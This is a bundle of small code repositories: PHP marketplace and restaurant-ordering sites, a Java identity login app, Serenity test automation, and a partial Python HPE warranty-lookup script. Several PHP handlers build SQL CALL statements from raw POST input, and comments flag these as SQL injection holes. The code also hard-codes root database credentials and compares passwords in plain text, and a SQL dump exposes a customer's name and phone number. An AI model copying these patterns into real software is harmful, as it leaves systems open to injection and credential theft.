            print "Error!: " . $e->getMessage() . "<br/>";
        }
    }
}
?>
<file_sep>
<html>
<body>
<?php
// Handles the product form POST: inserts one row into proba.products and
// reports success ("Vnesot beshe uspeshen." = "The insert was successful.").
$name = false;
$price = false;
$description = false;
$ID = false;
if (isset($_POST['name'])) {
    $name = $_POST['name'];
}
if (isset($_POST['price'])) {
    $price = $_POST['price'];
}
if (isset($_POST['description'])) {
    $description = $_POST['description'];
}
if (isset($_POST['id'])) {
    $ID = $_POST['id'];
}
$dbc = mysqli_connect('localhost', 'root', '', 'proba');
// SECURITY FIX: the POST values were interpolated directly into the INSERT
// string (SQL injection); a parameterised statement is used instead.
$stmt = mysqli_prepare($dbc, "INSERT INTO products (Name, Price, Description, ID) VALUES (?, ?, ?, ?)");
mysqli_stmt_bind_param($stmt, 'ssss', $name, $price, $description, $ID);
$vnes = mysqli_stmt_execute($stmt);
mysqli_stmt_close($stmt);
mysqli_close($dbc);
echo "Vnesot beshe uspeshen.";
?>
</body>
</html>
/*
 * Login handler for index.php.
 * Rewritten from the removed ext/mysql API (deprecated) to mysqli with a
 * prepared statement: the original concatenated raw POST input into the
 * SELECT (SQL injection). The alert/redirect flow is unchanged.
 */
$username = '';
$password = '';
if (isset($_POST['username'])) {
    $username = $_POST['username'];
}
if (isset($_POST['password'])) {
    $password = $_POST['password'];
}
$con = mysqli_connect("localhost", "root", "sudo");
if (!$con) {
    die('Database does not exist' . mysqli_connect_error());
}
mysqli_select_db($con, "Proba");
// BUG FIX: the original used the bitwise operator | instead of logical ||.
if (!$username || !$password)
{
    echo(" <SCRIPT LANGUGAGE='JavaScript'>
window.alert('You did not complete all the required fields')
window.location.href='index.php'
</SCRIPT>");
    exit();
}
// NOTE(review): passwords are stored and compared in plain text — they
// should be hashed with password_hash()/password_verify().
$stmt = mysqli_prepare($con, "SELECT * FROM login_users WHERE username = ? AND password = ?");
mysqli_stmt_bind_param($stmt, 'ss', $username, $password);
mysqli_stmt_execute($stmt);
mysqli_stmt_store_result($stmt);
if (mysqli_stmt_num_rows($stmt) > 0)
{
    // SECURITY FIX: escape the username before echoing it into the page/JS.
    echo ("<SCRIPT LANGUAGE='JavaScript'>
window.alert('Login Succesfully!. You are logged in as " . htmlspecialchars($username, ENT_QUOTES) . ". Continue?')
window.location.href='dashboard.html'
</SCRIPT>");
    exit();
}
else{
    mysqli_stmt_close($stmt);
    mysqli_close($con);
    echo("<SCRIPT LANGUGAGE='JavaScript'>
window.alert('Wrong username and password combination. Please re-enter.')
window.location.href='index.php'
</SCRIPT>");
    exit();
}
<file_sep><?php
// Renders the login page for ЈП ПАЗАРИ; the form posts to Forms/login.php.
// MARKUP FIXES: invalid </br> tags replaced with <br>, the second <label>
// is now closed, the label "for" attributes match the input ids, and the
// password input's redacted type attribute is restored to type="password".
echo'
<!DOCTYPE html>
<html lang="mk">
<head>
<title>ЈП ПАЗАРИ</title>
<meta charset="utf-8">
<link href="includes/index.css" rel="stylesheet" type="text/css"/>
<meta name="viewport" content="width=device-width, initial-scale=1">
</head>
<body>
<div id="container">
<form method="post" action="Forms/login.php">
<br><h2>ЈП ПАЗАРИ</h2><br>
<label for="username">Корисничко име</label><br>
<input type="text" id="username" name="username" value="" ><br><br>
<label for="password">Лозинка</label><br>
<input type="password" id="password" name="password"><br><br>
<input type="submit" value="Најави се">
</form>
</div>
</body>
</html>
';
// Handles the add-user form POST: runs the pazari.insertUsers stored
// procedure and redirects back to the form page.
require_once '../../includes/settings.php';
$obj=new connection(new Settings());
// NOTE(review): the fields are read only when 'submit' is ABSENT from the
// POST; if the form submits a 'submit' field the variables below stay
// undefined — confirm against userform.html.
if(!isset($_POST['submit'])){
$IDfier = $_POST["IDfier"];
$name = $_POST["name"];
$surname = $_POST["surname"];
$mail=$_POST["mail"];
$address = $_POST["address"];
$embg = $_POST["embg"];
$phone = $_POST["phone"];
$date=$_POST["date"];
$Password = $_POST["Password"];
$role=$_POST["role"];
}
// SECURITY NOTE(review): raw POST values are interpolated straight into the
// CALL statement — SQL injection. connection::execQuery() only accepts a
// finished query string, so fixing this needs a parameterised variant of
// that helper.
// NOTE(review): $role is read but never used; the role argument is the
// hard-coded literal 2.
$query = "CALL pazari.insertUsers('$address','$date','$mail','$embg','$IDfier','$name','$Password','$phone','$surname',2)";
$obj->execQuery($query,new Settings(),false);
$obj->CloseDbConnection();
header("Location: ../userform.html");
<file_sep><?php
// Handles the add-area form POST: runs the pazari.insertArea stored
// procedure and redirects back to the form page.
require_once '../../includes/settings.php';
$obj=new connection(new Settings());
// NOTE(review): fields are read only when 'submit' is absent from the POST —
// confirm against areaform.html.
if(!isset($_POST['submit'])){
$name = $_POST["name"];
$idfier = $_POST["idfier"];
$desc=$_POST["desc"];
}
// SECURITY NOTE(review): raw POST values interpolated into the CALL string —
// SQL injection; see the note in the user-insert handler.
$query = "CALL pazari.insertArea('$name','$desc','$idfier')";
$obj->execQuery($query,new Settings(),false);
$obj->CloseDbConnection();
header("Location: ../areaform.html");
<file_sep><?php
// Handles the add-product form POST: runs the pazari.insertProducts stored
// procedure and redirects back to the form page.
require_once '../../includes/settings.php';
$obj=new connection(new Settings());
// NOTE(review): fields are read only when 'submit' is absent from the POST —
// confirm against productsform.html.
if(!isset($_POST['submit'])){
$name = $_POST["name"];
$price = $_POST["price"];
$createdAt = $_POST["dateCrAt"];
$desc=$_POST["desc"];
}
// SECURITY NOTE(review): raw POST values interpolated into the CALL string —
// SQL injection; see the note in the user-insert handler.
$query = "CALL pazari.insertProducts('$createdAt','$desc','$name','$price')";
$obj->execQuery($query,new Settings(),false);
$obj->CloseDbConnection();
header("Location: ../productsform.html");
<file_sep><?php
// Handles the add-payment form POST: runs the pazari.insertPayments stored
// procedure and redirects back to the form page.
require_once '../../includes/settings.php';
$obj=new connection(new Settings());
// NOTE(review): fields are read only when 'submit' is absent from the POST —
// confirm against paymentsform.html. The identifier comes from the form's
// "option" select control.
if(!isset($_POST['submit'])){
$price = $_POST["price"];
$crAT = $_POST["crAT"];
$idfier = $_POST["option"];
$desc=$_POST["desc"];
}
// SECURITY NOTE(review): raw POST values interpolated into the CALL string —
// SQL injection; see the note in the user-insert handler.
$query = "CALL pazari.insertPayments('$crAT','$idfier','$price','$desc')";
$obj->execQuery($query,new Settings(),false);
$obj->CloseDbConnection();
header("Location: ../paymentsform.html");
<file_sep># Marketplace-project
A marketplace project developed with PHP and a MySQL database administered via phpMyAdmin.
| 1db56be079808ae4668b66938984c2c0833a5b5d | [
"Markdown",
"PHP"
] | 9 | PHP | MartinaSoluncevska/Marketplace | 9c634a2b0faf8223a5e2e0b57e6c3366a289ec0b | e75a32ee19d22210a4c2282cc58559051b69bb01 |
refs/heads/master | <repo_name>AbdulKShahid/Application-Java<file_sep>/IamCore/sql/sql.sql
create schema "ROOT"
CREATE TABLE IDENTITIES
(IDENTITY_ID INT NOT NULL GENERATED ALWAYS AS IDENTITY,
uid VARCHAR(255) NOT NULL PRIMARY KEY,
display_name VARCHAR(255),
email_id VARCHAR(255),
password VARCHAR(255) NOT NULL
);
ALTER TABLE IDENTITIES ADD COLUMN password varchar(255);
DROP TABLE IDENTITIES;<file_sep>/IamCore/src/services/IdentityDAO.java
package services;
import java.util.List;
import datamodel.Identity;
import exception.DaoCreateException;
import exception.DaoDeleteException;
import exception.DaoUpdateException;
/**
 * CRUD contract for persisting {@link Identity} records.
 */
public interface IdentityDAO {
    /** Persists a new identity. @throws DaoCreateException on failure. */
    public void create(Identity identity) throws DaoCreateException;
    /** Updates an existing identity. @throws DaoUpdateException on failure. */
    public void update(Identity identity) throws DaoUpdateException;
    /** Removes an identity. @throws DaoDeleteException on failure. */
    public void delete(Identity identity) throws DaoDeleteException;
    /** Returns identities matching the criteria (semantics defined by the implementation). */
    public List<Identity> search(Identity criteria);
}
<file_sep>/IamCore/src/services/LoginDAO.java
package services;
import java.sql.Connection;
import java.sql.PreparedStatement;
import java.sql.ResultSet;
import logger.Logger;
/**
 * Data-access object that validates user credentials against the
 * IDENTITIES table.
 */
public class LoginDAO {

    private static final Logger logger = new Logger(LoginDAO.class);

    /**
     * Checks whether a row exists in IDENTITIES with the given uid and
     * password.
     *
     * @param uid      the user id entered at login
     * @param password the password entered at login
     * @return true when the credentials match a stored identity
     *
     * NOTE(review): passwords are compared in plain text in SQL; they should
     * be stored hashed and verified with a hash comparison.
     */
    public boolean Authentication(String uid, String password) {
        boolean res = false;
        try {
            Connection con = Dbconnection.getconnection();
            // BUG FIX: the PreparedStatement and ResultSet are now closed via
            // try-with-resources; the original leaked both on every call.
            try (PreparedStatement statement = con.prepareStatement(
                    "select * from IDENTITIES where UID=? and PASSWORD=?")) {
                statement.setString(1, uid);
                statement.setString(2, password);
                try (ResultSet result = statement.executeQuery()) {
                    if (result.next()) {
                        res = true;
                    } else {
                        System.out.println("Invalid username or password!");
                    }
                }
            }
        } catch (Exception e) {
            logger.error("DB related Error");
            e.printStackTrace();
        }
        return res;
    }
}
<file_sep>/IamCore/src/datamodel/Identity.java
package datamodel;
/**
 * Plain data holder for one user identity: uid, display name, e-mail
 * address and password.
 */
public class Identity {

    private String uid;
    private String display_name;
    private String email_id;
    private String password;

    /** @return the user id stored in this identity */
    public String getUid() {
        return uid;
    }

    /** @param uid the user id to store */
    public void setUid(String uid) {
        this.uid = uid;
    }

    /** @return the display name stored in this identity */
    public String getDisplay_name() {
        return display_name;
    }

    /** @param display_name the display name to store */
    public void setDisplay_name(String display_name) {
        this.display_name = display_name;
    }

    /** @return the e-mail address stored in this identity */
    public String getEmail_id() {
        return email_id;
    }

    /** @param email_id the e-mail address to store */
    public void setEmail_id(String email_id) {
        this.email_id = email_id;
    }

    /** @return the password stored in this identity */
    public String getPassword() {
        return password;
    }

    /**
     * Stores the password in this identity.
     * BUG FIX: restores the assignment of the parameter — the previous body
     * ("this.password = <PASSWORD>;") was a redaction artifact and did not
     * compile.
     *
     * @param password the password to store
     */
    public void setPassword(String password) {
        this.password = password;
    }

    @Override
    public String toString() {
        return "display_name=" + display_name + " \nEmail_id=" + email_id + "\nUser Id=" + uid + "";
    }
}
| de8f7de25b791962879b9f5cbfd7887719e3f394 | [
"Java",
"SQL"
] | 4 | SQL | AbdulKShahid/Application-Java | 98940ede070f2d2693566a55b87ebc3198766a1b | 44e3149fc62313dab6020c794855c7b507c820a1 |
refs/heads/master | <repo_name>mahbubhssn/Delicious<file_sep>/README.md
# Delicious
This is a dynamic website for any restaurant. Any user as well as the owner of the restaurant can easily maintain their necessary role by using this. User can check the item with offered price and then order online. owner can see those order on their personal URL hidden from the user. User Role: Check different types of item, Order online. Owner Role: Insert their available item, Edit Delete Update item, Check order list.
<file_sep>/delicious.sql
-- phpMyAdmin SQL Dump
-- version 4.7.0
-- https://www.phpmyadmin.net/
--
-- Host: 127.0.0.1
-- Generation Time: Nov 29, 2017 at 08:20 AM
-- Server version: 10.1.26-MariaDB
-- PHP Version: 7.1.8
SET SQL_MODE = "NO_AUTO_VALUE_ON_ZERO";
SET AUTOCOMMIT = 0;
START TRANSACTION;
SET time_zone = "+00:00";
/*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */;
/*!40101 SET @OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS */;
/*!40101 SET @OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION */;
/*!40101 SET NAMES utf8mb4 */;
--
-- Database: `delicious`
--
-- --------------------------------------------------------
--
-- Table structure for table `item`
--
CREATE TABLE `item` (
`item_id` int(10) NOT NULL,
`item_name` varchar(50) NOT NULL,
`category` varchar(20) NOT NULL,
`price` int(20) NOT NULL,
`description` text NOT NULL,
`img_name` varchar(50) NOT NULL,
`img_path` varchar(50) NOT NULL,
`img_type` varchar(50) NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
--
-- Dumping data for table `item`
--
INSERT INTO `item` (`item_id`, `item_name`, `category`, `price`, `description`, `img_name`, `img_path`, `img_type`) VALUES
(1, 'Special Pudding', 'Desert', 100, 'As desire', '1.jpg', 'photo/1.jpg', 'image/jpeg'),
(2, 'Brawnie', 'Desert', 100, 'As desire', '2.jpg', 'photo/2.jpg', 'image/jpeg'),
(3, 'Vanilla Icecream', 'Desert', 100, 'As desire', '3.jpg', 'photo/3.jpg', 'image/jpeg'),
(4, 'Special Mix Icecream', 'Desert', 200, 'Enough for one person', '4.jpg', 'photo/4.jpg', 'image/jpeg');
-- --------------------------------------------------------
--
-- Table structure for table `order`
--
CREATE TABLE `order` (
`order_id` int(10) NOT NULL,
`item1` varchar(50) NOT NULL,
`quantity1` varchar(50) NOT NULL,
`item2` varchar(50) NOT NULL,
`quantity2` varchar(50) NOT NULL,
`item3` varchar(50) NOT NULL,
`quantity3` varchar(50) NOT NULL,
`fname` varchar(50) NOT NULL,
`lname` varchar(50) NOT NULL,
`email` varchar(50) NOT NULL,
`street` varchar(50) NOT NULL,
`area` varchar(50) NOT NULL,
`city` varchar(20) NOT NULL,
`zip` int(20) NOT NULL,
`country` varchar(50) NOT NULL,
`c_num` varchar(14) NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
--
-- Dumping data for table `order`
--
INSERT INTO `order` (`order_id`, `item1`, `quantity1`, `item2`, `quantity2`, `item3`, `quantity3`, `fname`, `lname`, `email`, `street`, `area`, `city`, `zip`, `country`, `c_num`) VALUES
(2, 'Pudding', '1', '', '', '', '', 'Mahbub', 'Hossain', '<EMAIL>', 'GA-87', 'Middle Badda', 'Dhaka', 1212, 'Bangladesh', '+8801521109326');
--
-- Indexes for dumped tables
--
--
-- Indexes for table `item`
--
ALTER TABLE `item`
ADD PRIMARY KEY (`item_id`);
--
-- Indexes for table `order`
--
ALTER TABLE `order`
ADD PRIMARY KEY (`order_id`);
--
-- AUTO_INCREMENT for dumped tables
--
--
-- AUTO_INCREMENT for table `item`
--
ALTER TABLE `item`
MODIFY `item_id` int(10) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=5;
--
-- AUTO_INCREMENT for table `order`
--
ALTER TABLE `order`
MODIFY `order_id` int(10) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=3;COMMIT;
/*!40101 SET CHARACTER_SET_CLIENT=@OLD_CHARACTER_SET_CLIENT */;
/*!40101 SET CHARACTER_SET_RESULTS=@OLD_CHARACTER_SET_RESULTS */;
/*!40101 SET COLLATION_CONNECTION=@OLD_COLLATION_CONNECTION */;
<file_sep>/Delicious/database/tbl_order.php
<?php
include("config.php");
$tbl_order = "CREATE TABLE IF NOT EXISTS `order`(
order_id INT(10) NOT NULL AUTO_INCREMENT, PRIMARY KEY(order_id),
item1 VARCHAR(50) NOT NULL,
quantity1 VARCHAR(50) NOT NULL,
item2 VARCHAR(50) NOT NULL,
quantity2 VARCHAR(50) NOT NULL,
item3 VARCHAR(50) NOT NULL,
quantity3 VARCHAR(50) NOT NULL,
fname VARCHAR(50) NOT NULL,
lname VARCHAR(50) NOT NULL,
email VARCHAR(50) NOT NULL,
street VARCHAR(50) NOT NULL,
area VARCHAR(50) NOT NULL,
city VARCHAR(20) NOT NULL,
zip INT(20) NOT NULL,
country VARCHAR(50) NOT NULL,
c_num VARCHAR(14) NOT NULL)";
$sql = mysqli_query($myconn,$tbl_order);
?><file_sep>/Delicious/database/tbl_item.php
<?php
include("config.php");
$tbl_item = "CREATE TABLE IF NOT EXISTS item(
item_id INT(10) NOT NULL AUTO_INCREMENT, PRIMARY KEY(item_id),
item_name VARCHAR(50) NOT NULL,
category VARCHAR(20) NOT NULL,
price INT(20) NOT NULL,
description TEXT NOT NULL,
img_name VARCHAR(50) NOT NULL,
img_path VARCHAR(50) NOT NULL,
img_type VARCHAR(50) NOT NULL)";
$sql = mysqli_query($myconn,$tbl_item);
?> | 814bef8f5a7fe7f15df9756f0f27d9949bc58a5e | [
"Markdown",
"SQL",
"PHP"
] | 4 | Markdown | mahbubhssn/Delicious | 40a2a6aa07d400e4a18e2abb614d062f2050f9ee | 3d79c492da185e4c0cbc3df6e379d2a1ecefb6f8 |
refs/heads/master | <file_sep>package BinarySearch;
public class BinarySearchAlgorithm {
public static void main(String[] args) {
int arr[] = {-4,-1,3,7,10,11};
int n = arr.length;
int target = 11;
// int ans1 = binarySearch1(arr,target);
// if(ans1 == -1)
// {
// System.out.println(target+ " is not present in the array");
// }
// else
// {
// System.out.println(target + " present at " + ans1 + " index");
// }
int low = 0;
int high = n - 1;
int ans2 = binarySearch2(arr,target,low,high);
//T.C. = O(Logn), S.C. = O(Logn) //Slower
if(ans2 == -1)
{
System.out.println(target+ " is not present in the array");
}
else
{
System.out.println(target + " present at " + ans2 + " index");
}
}
static int binarySearch1(int a[], int target)
{
int n = a.length;
int low = 0;
int high = n - 1;
while(low <= high)
{
int mid = (low + high) / 2;
if(a[mid] == target)
{
return mid;
}
else if(a[mid] < target)
{
low = mid + 1;
}
else
{
high = mid - 1;
}
}
return -1;
}
static int binarySearch2(int a[], int target, int low, int high)
{
if(low > high) return -1;
int mid = (low + high) / 2;
if(a[mid] == target) return mid;
if(a[mid] < target)
{
return binarySearch2(a,target,mid+1,high);
}
return binarySearch2(a,target,low,mid-1);
}
}
<file_sep>package BinarySearch;
public class SearchInfiniteSortedArray {
public static void main(String[] args) {
int a[] = {1,3,7,8,12,58,72,89,90,98,99,123,234,345,456,567,678,789};
int target = 124;
int ans = searchInfinite(a,target);
if(ans == -1)
{
System.out.println(target+" not present");
}
else
{
System.out.println(target+" present inside the array at "+ans+" index");
}
}
static int searchInfinite(int a[], int target)
{
int low = 0;
int high = 1;
while(a[high] < target)
{
low = high;
high = 2 * high;
}
return binarySearch(a,target,low,high);
}
static int binarySearch(int a[], int key, int low, int high)
{
while(low <= high)
{
int mid = (low + high) / 2;
if(a[mid] == key)
{
return mid;
}
else if(a[mid] < key)
{
low = mid + 1;
}
else
{
high = mid - 1;
}
}
return -1;
}
}
| d699f4aae4054f547ff6b4519f0015f131655110 | [
"Java"
] | 2 | Java | Dhruvil17/Hactoberfest-2021 | 60423606cf83c4eb0f232826418651ddea6328ab | 7669db093c36f7f6eb6528d829565b5112218ccc |
refs/heads/master | <repo_name>albertolopez9304/ChoucairEmpleos<file_sep>/src/main/java/co/com/choucairempleos/questions/VerifyJobs.java
package co.com.choucairempleos.questions;
import co.com.choucairempleos.userinterface.SearchJobsPage;
import net.serenitybdd.screenplay.Actor;
import net.serenitybdd.screenplay.Question;
import net.serenitybdd.screenplay.questions.Text;
public class VerifyJobs implements Question<Boolean> {
private String keyword;
public VerifyJobs(String keyword) {
this.keyword = keyword;
}
public static VerifyJobs with(String keywords) {
return new VerifyJobs(keywords);
}
@Override
public Boolean answeredBy(Actor actor) {
String expectedJobs = Text.of(SearchJobsPage.VERIFY_JOBS).viewedBy(actor).asString();
System.out.println(keyword);
System.out.println(expectedJobs);
return (expectedJobs.equals(keyword));
}
}
<file_sep>/src/main/java/co/com/choucairempleos/questions/VerifyMessageError.java
package co.com.choucairempleos.questions;
import co.com.choucairempleos.userinterface.RegisterForApplyPage;
import net.serenitybdd.screenplay.Actor;
import net.serenitybdd.screenplay.Question;
import net.serenitybdd.screenplay.questions.Text;
public class VerifyMessageError implements Question<Boolean> {
private String messageFailed;
public VerifyMessageError(String messageFailed) {
this.messageFailed = messageFailed;
}
public static VerifyMessageError with(String messageFailed) {
return new VerifyMessageError(messageFailed);
}
@Override
public Boolean answeredBy(Actor actor) {
String expectedMessageFailed = Text.of(RegisterForApplyPage.CV_IS_REQUIRED).viewedBy(actor).asString();
return (expectedMessageFailed.equals(messageFailed));
}
}
<file_sep>/src/main/java/co/com/choucairempleos/model/DataUser.java
package co.com.choucairempleos.model;
public class DataUser {
private String city;
private String keywords;
public String getCity() {
return city;
}
public String getKeywords() {
return keywords;
}
}
<file_sep>/settings.gradle
rootProject.name = 'co.com.choucairempleos'
<file_sep>/src/main/java/co/com/choucairempleos/userinterface/RegisterForApplyPage.java
package co.com.choucairempleos.userinterface;
import net.serenitybdd.screenplay.targets.Target;
import org.openqa.selenium.By;
public class RegisterForApplyPage {
public static final Target APPLY_FOR_JOB = Target.the("Button Apply For Job").located(By.xpath("//input[@class=\"application_button button\"]"));
public static final Target SCROLL = Target.the("Button Apply For Job").located(By.xpath("//*[@id=\"post-7547\"]/div/div[2]/div[2]/p[3]/strong"));
public static final Target FULL_NAME = Target.the("Full Name").located(By.id("nombre-completo"));
public static final Target EMAIL = Target.the("Email").located(By.id("correo-electronico"));
public static final Target PHONE = Target.the("Phone").located(By.id("celular-o-telefono-de-contacto"));
public static final Target FORMAL_STUDIES = Target.the("Formal Studies").located(By.id("que-estudios-formales-tienes-o-en-que-semestre-te-encuentras-actualmente"));
public static final Target EXPERIENCE = Target.the("Experience").located(By.id("que-tiempo-de-experiencia-certificada-tienes-en-pruebas-o-en-desarrollo-de-softwaresi-aplica"));
public static final Target KNOW_AUTOMATION = Target.the("Know Automation").located(By.id("conoces-de-automatizacion-de-pruebas-te-gustaria-aprendersi-aplica"));
public static final Target SALARY = Target.the("Salary").located(By.id("cual-es-tu-aspiracion-salarial"));
public static final Target AVAILABILITY = Target.the("Availability").located(By.id("si-eres-seleccionado-que-disponibilidad-de-tiempo-para-ingresar-tendrias"));
public static final Target MESSAGE = Target.the("Additional Message").located(By.id("mensaje-adicional"));
public static final Target SEND_APLICATION = Target.the("Button Send Aplication").located(By.xpath("//input[@class=\"button wp_job_manager_send_application_button\"]"));
public static final Target CV_IS_REQUIRED = Target.the("Message Expected").located(By.xpath("//*[contains(text(), '\"CV\" is a required field')]"));
}
<file_sep>/src/test/java/co/com/choucairempleos/runners/ChoucairJobsRunner.java
package co.com.choucairempleos.runners;
import cucumber.api.CucumberOptions;
import cucumber.api.SnippetType;
import net.serenitybdd.cucumber.CucumberWithSerenity;
import org.junit.runner.RunWith;
@RunWith(CucumberWithSerenity.class)
@CucumberOptions(
features = "src/test/resources/features/choucairJobs.feature",
tags = "@stories",
glue = {"co.com.choucairempleos.stepdefinitions","co.com.choucairempleos.util"},
snippets = SnippetType.CAMELCASE)
public class ChoucairJobsRunner {
}
<file_sep>/src/main/java/co/com/choucairempleos/util/Constant.java
package co.com.choucairempleos.util;
public class Constant {
public static final String URL_BASE = "https://www.choucairtesting.com";
public static final int ZERO = 0;
}<file_sep>/src/main/java/co/com/choucairempleos/task/RegisterForApply.java
package co.com.choucairempleos.task;
import co.com.choucairempleos.model.ApplyForJobsData;
import static co.com.choucairempleos.userinterface.RegisterForApplyPage.*;
import net.serenitybdd.screenplay.Actor;
import net.serenitybdd.screenplay.Task;
import net.serenitybdd.screenplay.Tasks;
import net.serenitybdd.screenplay.actions.*;
public class RegisterForApply implements Task {
private ApplyForJobsData applyForJobsData;
public RegisterForApply(ApplyForJobsData applyForJobsData) {this.applyForJobsData = applyForJobsData;}
public static RegisterForApply onThePageWith(ApplyForJobsData applyForJobsData) {
return Tasks.instrumented(RegisterForApply.class, applyForJobsData);
}
@Override
public <T extends Actor> void performAs(T actor) {
actor.attemptsTo(
Scroll.to(SCROLL),
Click.on(APPLY_FOR_JOB),
Enter.theValue(applyForJobsData.getName()).into(FULL_NAME),
Enter.theValue(applyForJobsData.getEmail()).into(EMAIL),
Enter.theValue(applyForJobsData.getPhone()).into(PHONE),
Enter.theValue(applyForJobsData.getFormalStudies()).into(FORMAL_STUDIES),
Enter.theValue(applyForJobsData.getCertifiedExperience()).into(EXPERIENCE),
Enter.theValue(applyForJobsData.getKnowAutomation()).into(KNOW_AUTOMATION),
Enter.theValue(applyForJobsData.getWageAspiration()).into(SALARY),
Enter.theValue(applyForJobsData.getTimeAvailability()).into(AVAILABILITY),
Enter.theValue(applyForJobsData.getAdditionalMessage()).into(MESSAGE),
Scroll.to(AVAILABILITY),
Click.on(SEND_APLICATION)
);
}
}
| f768f0d91473887c8fdcef9467108eded23c3111 | [
"Java",
"Gradle"
] | 8 | Java | albertolopez9304/ChoucairEmpleos | 4981b9a2c8904c0a97ddb5f7cabc62ed62808d8f | d3a2639afa6690a04e7c12e91decc340609a1ea9 |
refs/heads/master | <repo_name>yayyuh/Github<file_sep>/hpe wty req with GUI.py
import requests
import json
import numpy as np
import pandas as pd
import re
import tkinter as tk
from datetime import datetime as dt
##########################################################
def getWarranty():
serialNo = serial_no.get()
partNo = product_no.get()
data = {'SerialNumber': str(serialNo),
'ProductNumber': str(partNo)}
s = requests.Session()
url = "http://www.smartenablement.com/HPE/PostWarranties/ws.asmx/GetEntitlement"
headers = {
'Host': 'www.smartenablement.com',
'Connection': 'keep-alive',
'Content-Length': '58',
'Accept': 'application/json, text/javascript, */*; q=0.01',
'Origin': 'http://www.smartenablement.com',
'X-Requested-With': 'XMLHttpRequest',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.97 Safari/537.36',
'Content-Type': 'application/json; charset=UTF-8',
'Referer': 'http://www.smartenablement.com/HPE/PostWarranties/LookUp.aspx?&Serial=' + str(serialNo) + '&Product=' + str(partNo),
'Accept-Encoding': 'gzip, deflate',
'Accept-Language': 'en-US,en;q=0.9'}
# 'Cookie': 'ASP.NET_SessionId=gr1celcvd5foqv2aavtijzmq'}
currentWarr = post(s, url, data, headers)
url = 'http://www.smartenablement.com/HPE/PostWarranties/ws.asmx/GetSupportServices'
headers = {
'Host': 'www.smartenablement.com',
'Connection': 'keep-alive',
'Content-Length': '30',
'Accept': 'application/json, text/javascript, */*; q=0.01',
'Origin': 'http://www.smartenablement.com',
'X-Requested-With': 'XMLHttpRequest',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.97 Safari/537.36',
'Content-Type': 'application/json; charset=UTF-8',
'Referer': 'http://www.smartenablement.com/HPE/PostWarranties/LookUp.aspx?&Serial=' + str(serialNo) + '&Product=' + str(partNo),
'Accept-Encoding': 'gzip, deflate',
'Accept-Language': 'en-US,en;q=0.9'}
# 'Cookie': 'ASP.NET_SessionId=gr1celcvd5foqv2aavtijzmq'}
warrOptions = post(s, url, data, headers)
a = json.loads(warrOptions)
olist = a['d']['RecommendedSupportServiceDisplayItems']
olist2 = a['d']['SupportServiceDisplayItems']
###############################################################
b=json.loads(currentWarr)
wlist = b['d']['EntitlementSummaryList']
currentWarDf = pd.DataFrame(wlist, columns=['endDate','startDate','packageOfferReferenceDescription','supportServiceProductNumber'])
currentWarDf = currentWarDf.rename(columns={'endDate':"End Date",'startDate':'Start Date','packageOfferReferenceDescription':'Description','supportServiceProductNumber':'Product Number'}).sort_values(by=['End Date'], ascending=False)
currentWarDf['End Date'] = currentWarDf['End Date'].astype('datetime64[ns]')
currentWarDf['Start Date'] = currentWarDf['Start Date'].astype('datetime64[ns]')
currentWarDf['Description'] = currentWarDf['Description'].astype(str)
model_regex = re.compile(r'\b(D|M)L\d*[a-zA-Z]?\s[a-zA-Z]*\d(/sv2)?\b', re.I)
svr_modelno = "Model # not found."
for i in currentWarDf['Description']:
if model_regex.search(i):
a = model_regex.search(i)
svr_modelno = a.group()
break
try:
original_date = min(currentWarDf['Start Date'])
except:
print('Original date not found.')
pass
try:
end_date = max(currentWarDf['End Date'])
except:
print('End date not found.')
pass
currentWarDf_noncurr = currentWarDf[currentWarDf['End Date']<dt.today()]
currentWarDf = currentWarDf[currentWarDf['End Date']>dt.today()]
wOptionsDf1 = pd.DataFrame(olist)
wOptionsDf2 = pd.DataFrame(olist2)
wOptionsDf = pd.concat([wOptionsDf1, wOptionsDf2])
duras = list()
levels = list()
wOptionsDf = wOptionsDf[~wOptionsDf['SupportServiceProductDescription'].str.contains('DMR')]
wOptionsDf = wOptionsDf[~wOptionsDf['SupportServiceProductDescription'].str.contains('Proactive')]
for desc in wOptionsDf['SupportServiceProductDescription']:
dura_regex = re.compile(r'\b\d\s\wear\b').search(desc)
duras.append(dura_regex.group())
if re.compile(r'(next.business.day)|(nbd)', re.I).search(desc):
levels.append("NBD")
elif re.compile(r'(24x7)|(4hr)', re.I).search(desc):
levels.append("4Hr")
elif re.compile(r'(call.to.repair)|(6HR)', re.I).search(desc):
levels.append('6Hr CTR')
else:
levels.append('no data')
wOptionsDf['Duration'] = duras
wOptionsDf['Warranty Type'] = levels
wOptionsDf = wOptionsDf.drop(columns=['SupportServiceProductDescription', 'CoverageWindow'])
wOptionsDf = wOptionsDf.rename(columns={'PriceLocalList': 'List Price', 'SupportServiceProductNumber': 'Product Number'})
wOptionsDf = wOptionsDf.sort_values(by=['List Price', 'Duration'])
#######################################################################################
# wOptionsDf
global output_label
output_data = ''
output_data += 'Warranty Information'+'\n'+'Model: ' + str(svr_modelno)+'\n'+'Serial# ' + str(serialNo)+'\n'+'\n'
if end_date>dt.today():
curr_warr_pn = currentWarDf['Product Number'].tolist()[0]
wOptionsDf['Product Number'] = wOptionsDf['Product Number'].apply(lambda s: s + '*' if s == curr_warr_pn else s)
regex_timeleft = re.compile(r'(.*)(\s\d\d:\d\d:\d.*)')
h = str(end_date - dt.today())
time_left = regex_timeleft.search(h).group(1)
output_data += '\n''\n''Current warranty: ''\n'
output_data += currentWarDf.to_string(index=False)
output_data += '\n' + str(time_left) + ' until expiration.'
else:
output_data += 'Warranty expired.'
# print('\n'"Previous warranties:")
# print(currentWarDf_noncurr.to_string(index=False))
wOptionsDf['List Price'] = wOptionsDf['List Price'].apply(lambda s: '$' + s)
output_data += '\n''\n'"Foundation Care Support Renewal options:"'\n'
output_data += wOptionsDf.to_string(index=False)
output_data += '\n'" *current warranty"
output_label['text'] = output_data
def post(session, url, data, headers):
r = session.post(url, json=data, headers=headers)
result = jprint(r.json())
return result
def jprint(obj):
